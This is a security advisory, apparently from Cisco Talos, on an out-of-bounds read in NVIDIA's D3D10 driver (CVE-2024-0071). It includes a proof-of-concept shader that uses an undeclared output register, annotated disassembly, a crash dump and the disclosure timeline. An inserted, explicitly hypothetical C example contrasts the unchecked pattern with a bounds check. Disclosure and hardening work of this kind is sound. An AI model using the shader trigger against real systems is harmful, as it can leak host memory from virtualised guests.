CVE-2024-0071
An out-of-bounds read vulnerability exists in the Shader functionality of NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601. A specially crafted executable/shader file can lead to an out-of-bounds read. An attacker can provide a specially crafted shader file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601
D3D10 Driver - https://nvidia.com
7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125 - Out-of-bounds Read
NVIDIA graphics drivers are the software for NVIDIA GPUs installed in a PC; they mediate communication between the operating system and the GPU device. In most cases this software is required for the hardware to function properly.
This vulnerability could potentially be triggered from guest machines running in virtualization environments (i.e. VMware, QEMU, VirtualBox, etc.) in order to perform a guest-to-host escape (demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly). We were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, which causes the vulnerable code to execute on the Hyper-V host (inside the rdvgm.exe process). While RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.
This vulnerability can be triggered by supplying a malformed shader. This leads to an out-of-bounds memory read in the NVIDIA driver.
Example of a shader triggering the bug:
…
dcl_output o0.xyzw
dcl_temps 1
div r0.xy, v0.xyxx, cb0[0].xyxx
sample r0.xyz, r0.xyxx, resource[0].xyzw, sampler[0]
mov o0.xyz, r0.xyzx
mov o16171776.w, l(1)
ret
By specifying an output register number that exceeds the declared range (o16171776 in the shader above, where only o0 is declared), it is possible to force the NVIDIA driver to read arbitrary memory data. The vulnerable code is presented below:
00007FFE600A7B61 | 44:8B1B | mov r11d,dword ptr ds:[rbx] |
00007FFE600A7B64 | B8 02000012 | mov eax,12000002 |
00007FFE600A7B69 | 45:8B4D 28 | mov r9d,dword ptr ds:[r13+28] | *
00007FFE600A7B6D | 41:BC 34110000 | mov r12d,1134 |
00007FFE600A7B73 | 4C:8B56 20 | mov r10,qword ptr ds:[rsi+20] |
00007FFE600A7B77 | 41:83FB 1C | cmp r11d,1C |
00007FFE600A7B7B | 77 09 | ja nvwgf2umx.7FFE600A7B86 |
00007FFE600A7B7D | 44:0FA3D8 | bt eax,r11d |
00007FFE600A7B81 | 41:8BFC | mov edi,r12d |
00007FFE600A7B84 | 72 05 | jb nvwgf2umx.7FFE600A7B8B |
00007FFE600A7B86 | BF C8110000 | mov edi,11C8 |
00007FFE600A7B8B | 41:B8 34000000 | mov r8d,34 |
00007FFE600A7B91 | 41:8BD7 | mov edx,r15d |
00007FFE600A7B94 | 41:0FA3D6 | bt r14d,edx |
00007FFE600A7B98 | 73 26 | jae nvwgf2umx.7FFE600A7BC0 |
00007FFE600A7B9A | 46:8D3C8D 00000000 | lea r15d,qword ptr ds:[r9*4] | *
00007FFE600A7BA2 | 41:8D0C17 | lea ecx,qword ptr ds:[r15+rdx] | *
00007FFE600A7BA6 | 49:03CA | add rcx,r10 |
00007FFE600A7BA9 | 0FB60439 | movzx eax,byte ptr ds:[rcx+rdi] | * out-of-bounds read
The RCX register value (the operand of the memory read) is computed from the register number supplied by the attacker in the bytecode: r9d is loaded from [r13+28], scaled by four (lea r15d,[r9*4]), added to rdx and then to the table base in r10, with no comparison against the number of registers the shader declared. The attacker therefore controls the address of the read operation. This leads to an out-of-bounds read and a potential memory leak (especially if the shader originates from a guest in a virtualized environment, which would allow the attacker to use this attack to leak host data to the guest).
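The pattern described above, shown as an added example that is not NVIDIA's code or part of the advisory: a hypothetical, simplified model of a per-register metadata table indexed by an output register number parsed from the shader text. unchecked_entry_offset reproduces the vulnerable shape (an attacker-controlled index scaled straight into an address), while checked_entry and output_reg_in_range show the check a decoder should apply against the dcl_output declaration before forming any address. All names, the 4-byte entry size, MAX_OUTPUT_REGS and the sample lines are assumptions or constructed from the shader excerpt above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model (not NVIDIA's code) of the table the disassembly indexes:
 * one 4-byte metadata entry per output register, addressed as
 * base + reg*4 + component, mirroring "lea r15d,[r9*4]" followed by the add
 * and the movzx. The size is an assumption for the example. */
#define MAX_OUTPUT_REGS 32u

typedef struct {
    uint32_t declared_outputs;             /* register count implied by dcl_output */
    uint8_t  entries[MAX_OUTPUT_REGS * 4]; /* per-register metadata, 4 bytes each */
} shader_ctx;

/* Vulnerable pattern: the register index comes straight from the bytecode and
 * is scaled into a table offset with no range check. Only the offset is
 * returned here; nothing is dereferenced. */
size_t unchecked_entry_offset(uint32_t reg_index, uint32_t component)
{
    return (size_t)reg_index * 4 + component;
}

/* Hardened pattern: validate the index against both the count the shader
 * declared and the backing storage before any address is formed.
 * Returns 0 and writes *out on success, -1 on an out-of-range operand. */
int checked_entry(const shader_ctx *ctx, uint32_t reg_index,
                  uint32_t component, uint8_t *out)
{
    if (component > 3) return -1;
    if (reg_index >= ctx->declared_outputs) return -1; /* not declared by dcl_output */
    if (reg_index >= MAX_OUTPUT_REGS) return -1;       /* storage bound, defence in depth */
    *out = ctx->entries[(size_t)reg_index * 4 + component];
    return 0;
}

/* Convenience wrapper: zeroed context with `declared` outputs, one lookup.
 * Returns checked_entry's result (0 accepted, -1 rejected). */
int checked_entry_accepts(uint32_t declared, uint32_t reg_index)
{
    shader_ctx ctx;
    memset(&ctx, 0, sizeof ctx);
    ctx.declared_outputs = declared;
    uint8_t value;
    return checked_entry(&ctx, reg_index, 3, &value);
}

/* Extract N from a textual "... oN.<mask> ..." operand such as "mov o0.xyz, r0.xyzx".
 * Returns -1 if the line names no output register. */
long parse_output_reg(const char *line)
{
    const char *p = strstr(line, " o");
    if (!p) return -1;
    p += 2;
    char *end;
    unsigned long n = strtoul(p, &end, 10);
    if (end == p || *end != '.') return -1;
    return (long)n;
}

/* Validate one instruction line against the declared output count.
 * Returns 1 when the output register is in range, 0 when it exceeds the
 * declaration (the condition the advisory describes), -1 when the line
 * names no output register. */
int output_reg_in_range(uint32_t declared_outputs, const char *line)
{
    long reg = parse_output_reg(line);
    if (reg < 0) return -1;
    return (unsigned long)reg < declared_outputs ? 1 : 0;
}

int main(void)
{
    /* Constructed sample: lines taken from the advisory's shader excerpt. */
    static const char *const lines[] = {
        "dcl_output o0.xyzw",
        "mov o0.xyz, r0.xyzx",
        "mov o16171776.w, l(1)",
        "ret",
    };
    uint32_t declared = 1; /* assumption: dcl_output o0 declares one register */
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int r = output_reg_in_range(declared, lines[i]);
        printf("%-24s -> %s\n", lines[i],
               r == 1 ? "ok" : r == 0 ? "REJECT: register exceeds dcl_output range"
                                      : "no output operand");
    }
    return 0;
}
```

The check belongs where the operand is decoded, before the index is scaled: once the index has been folded into an address, as at the lea/add/movzx sequence above, there is nothing left to compare it against.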
0:017> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Analysis.CPU.mSec
Value: 1312
Key : Analysis.Elapsed.mSec
Value: 9602
Key : Analysis.IO.Other.Mb
Value: 18
Key : Analysis.IO.Read.Mb
Value: 0
Key : Analysis.IO.Write.Mb
Value: 30
Key : Analysis.Init.CPU.mSec
Value: 624
Key : Analysis.Init.Elapsed.mSec
Value: 16333
Key : Analysis.Memory.CommitPeak.Mb
Value: 86
Key : Failure.Bucket
Value: INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown
Key : Failure.Hash
Value: {7b367f86-064a-2e05-5dc0-760739d560ad}
Key : Timeline.OS.Boot.DeltaSec
Value: 591430
Key : Timeline.Process.Start.DeltaSec
Value: 16
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Version
Value: 10.0.19041.1
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffe600a7ba9 (nvwgf2umx!NVENCODEAPI_Thunk+0x0000000000112949)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000297e058190b
Attempt to read from address 00000297e058190b
FAULTING_THREAD: 000018ec
PROCESS_NAME: POC_EXEC11.exe
READ_ADDRESS: 00000297e058190b
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000297e058190b
STACK_TEXT:
000000d8`efb8e810 00007ffe`600ac664 : 000000d8`efb8ec80 00000002`00010000 00000297`dc7cb8e0 00000000`00000000 : nvwgf2umx!NVENCODEAPI_Thunk+0x112949
000000d8`efb8eaa0 00007ffe`6008f2e1 : 00000297`dc7cfb40 000000d8`efb8ef48 000000d8`efb8ef48 000000d8`efb8ec80 : nvwgf2umx!NVENCODEAPI_Thunk+0x117404
000000d8`efb8eb50 00007ffe`60242ae5 : 00007ffe`5fe00000 00006492`3dd45a97 00000297`dc7cfb40 00000000`00000001 : nvwgf2umx!NVENCODEAPI_Thunk+0xfa081
000000d8`efb8ee70 00007ffe`6007cfbd : 00007ffe`600c08b4 000000d8`efb8eee0 00000297`dc7cb8e0 00000000`00000001 : nvwgf2umx!NVAPI_Thunk+0x166e55
000000d8`efb8eea0 00007ffe`6007bf20 : 00000000`fffff865 000000d8`efb8f3d0 00000000`fffff80e 00000000`ffffffff : nvwgf2umx!NVENCODEAPI_Thunk+0xe7d5d
000000d8`efb8f350 00007ffe`5fecbe1f : 00000000`00000000 00000000`00000000 00000297`00000005 000000d8`efb8f7f0 : nvwgf2umx!NVENCODEAPI_Thunk+0xe6cc0
000000d8`efb8f400 00007ffe`5fecd40b : 00000297`d86e5280 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3ce0f
000000d8`efb8f4e0 00007ffe`616637fa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3e3fb
000000d8`efb8f7c0 00007ffe`616634f8 : 00000000`00000000 00000297`d65f2700 00000000`00000000 00000297`dc80c760 : nvwgf2umx!NVDEV_Thunk+0x380ca
000000d8`efb8f8e0 00007ffe`61692fa3 : 00000000`00000000 00000000`00000000 00000297`d86d67c0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x37dc8
000000d8`efb8f990 00007ffe`61692e9f : 00000000`00000000 00000297`dc91f5e0 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x67873
000000d8`efb8f9e0 00007ffe`61c418ee : 00000297`dc91f5e0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6776f
000000d8`efb8fa10 00007fff`24307344 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6161be
000000d8`efb8fa40 00007fff`25e826b1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000d8`efb8fa70 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx+112949
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: ~17s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 31.0.15.4601
FAILURE_ID_HASH: {7b367f86-064a-2e05-5dc0-760739d560ad}
Followup: MachineOwner
---------
2023-11-15 - Vendor Disclosure
2024-02-28 - Vendor Patch Release
2024-02-29 - Public Release
Discovered by Piotr Bania of Cisco Talos.